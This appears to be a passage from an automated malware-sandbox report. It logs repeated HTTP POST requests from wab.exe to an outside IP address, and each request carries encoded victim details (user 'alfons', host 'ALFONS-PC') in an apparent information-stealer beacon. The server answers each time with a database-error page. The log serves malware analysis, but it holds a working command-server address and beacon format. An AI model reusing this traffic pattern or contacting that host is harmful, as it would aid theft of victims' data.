                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:56.267621040 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:56.267632008 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              50192.168.2.54977024.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:56.584321022 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:56.746819973 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:57.563647985 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:56 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:57.563736916 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:57.563750029 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              51192.168.2.54977124.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:57.883312941 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:58.046102047 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:58.849102020 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:57 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:58.849136114 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:58.849158049 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              52192.168.2.54977224.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:59.169570923 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:59.332190037 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:00.163045883 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:59 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:00.163074970 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:00.163089991 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              53192.168.2.54977324.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:16:00.483740091 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:16:00.646531105 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:01.455938101 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:16:00 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
